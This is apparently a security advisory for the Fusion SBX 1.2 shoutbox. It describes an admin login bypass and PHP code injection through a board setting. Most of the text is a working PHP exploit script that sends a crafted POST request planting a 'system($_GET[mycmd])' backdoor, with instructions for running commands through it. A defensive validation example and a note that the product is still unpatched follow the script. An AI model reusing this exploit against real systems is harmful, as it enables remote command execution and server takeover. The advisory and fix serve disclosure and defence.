Fusion SBX "will allow your visitors to post comments on your sites, or just say hi. And the best of all is that, it is flat-file, that means that you do not need a MySQL database to install Fusion SBX. You have complete control over the shoutout board".
A vulnerability in Fusion SBX allows remote attackers to modify the product's settings without knowing the administrator password. In addition, by injecting arbitrary PHP code into one of the board's settings, a remote attacker can cause the program to execute arbitrary code.
Credit:
The information has been provided by Dave.
Vulnerable Systems:
* Fusion SBX version 1.2 and prior
Exploit:
<?
/*
* Fusion SBX <= 1.2 admin panel login bypass and remote-command execution exploit
* Exploit discovered 2005-5-2 in about 10 minutes of code lookover for login
* without proper details, then fooled around and found this nice remote command
* execution bug with it.
*
* This code will open a backdoor on the requested site running Fusion SBX 1.2 or
* lower, so you can just call www.site.com/sbx/index.php?mycmd=id or something.
* Newbie tip: Look in the source code after loading an attacked page for a
* properly-formatted command result that isn't all just stuffed on one line.
*
* When you execute commands using this bug, it'll give some error about headers
* already sent, but that's ok. Hacking is sometimes messy.
*
* irc.kidindustries.net #main
* dave {AT] kidindustries !DOT% net
*
* They call me Davus... Also known as Kidiot or Hook?
* NOT Dedicated to the Habbo kiddies... OK, maybe some of 'em. ;)
* Greets to Sirak, Ed, Pyxsul, and remember... CHRISSY > YOU
*/
$host = "localhost";
$path = "/sbx/admin/"; // Starting and trailing slash needed (/sbx/admin/ and such)
echo "[+] URL: http://$host$path\n";
$post =
"set2=basic&admin_set2=standard&lang2=english&plimit2=10".
"&noname2=Guest&refresh2=120&maxname2=30%3B%40system".
"%28%24_GET%5Bmycmd%5D%29&maxmess2=120&maxlink2=120".
"&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1".
"&setsubmit=Commit+Changes&is_logged=1";
// Didn't trim up $post from useless variables such as the submit button, but whatever.
$req = "POST $path?settings HTTP/1.0\r\n";
$req .= "Host: $host\r\n";
$req .= "Connection: close\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n\r\n";
$req .= $post;
echo "[+] Request built, using:\n$post\nas post data\n";
if($sck = fsockopen($host, 80)) {
echo "[+] Connected, sending request\n";
fwrite($sck, $req);
echo "[+] Request dumped to server!\n\n\n\n";
// $reply = fread($sck, 1048576); // A megabyte is MORE than enough.
// echo "[~] Server replied:\n$reply\n";
// Eh, uncomment if you wish, I just had to debug this script a bit.
fclose($sck);
echo "Now try http://$host$path?mycmd=id to see if exploit was successful...\n";
}
else {
echo "[-] Connection failed!\n";
exit(-1); }
?>
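
A server-side check that addresses both problems described above (login state accepted from the request, and a settings value that ends up executed as PHP), given as an added example that is not Fusion SBX code or a vendor patch. Field names are taken from the POST body in the exploit; the numeric ranges, the `sbx_admin` session key, the function names and the JSON storage format are assumptions.

```php
<?php
// Added example, not Fusion SBX code. Field names come from the POST body
// shown in the advisory; types and ranges below are assumptions.
const SBX_INT_FIELDS = [            // name => [min, max]
    'plimit2' => [1, 100], 'refresh2' => [10, 3600], 'maxname2' => [1, 255],
    'maxmess2' => [1, 2000], 'maxlink2' => [1, 2000], 'maxword2' => [1, 255],
    'wordbanning2' => [0, 1], 'wrapstat2' => [0, 1], 'postorder2' => [0, 1],
];
const SBX_TOKEN_FIELDS = ['set2', 'admin_set2', 'lang2', 'noname2'];

function sbx_validate_settings(array $post, array $session): array
{
    // Login state must come from the server-side session, never from a
    // request parameter such as is_logged=1.
    if (empty($session['sbx_admin'])) {   // hypothetical session key
        throw new RuntimeException('not authenticated');
    }
    $clean = [];
    foreach (SBX_INT_FIELDS as $name => [$min, $max]) {
        // Anything that is not a plain in-range integer (missing, array,
        // or digits followed by other characters) yields false here.
        $value = filter_var($post[$name] ?? null, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => $min, 'max_range' => $max]]);
        if ($value === false) {
            throw new InvalidArgumentException("bad integer for $name");
        }
        $clean[$name] = $value;
    }
    foreach (SBX_TOKEN_FIELDS as $name) {
        $value = $post[$name] ?? '';
        if (!is_string($value) || !preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $value)) {
            throw new InvalidArgumentException("bad value for $name");
        }
        $clean[$name] = $value;
    }
    return $clean;
}

function sbx_save_settings(array $clean, string $file): void
{
    // Store data, not code: JSON is read back with json_decode(), so a
    // setting is never interpreted as PHP source when it is loaded.
    file_put_contents($file, json_encode($clean, JSON_PRETTY_PRINT), LOCK_EX);
}
```

Called as `sbx_save_settings(sbx_validate_settings($_POST, $_SESSION), $file)`, a request without an authenticated session is rejected before any setting is read, and a `maxname2` value that is not a bare integer raises `InvalidArgumentException` instead of being written.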

Subject: Still not patched
Date: 22 Oct. 2005
From: davekidindustries.net

Surprisingly enough, Fusion PHP still hasn't patched the code. I suppose it's a mostly abandoned project.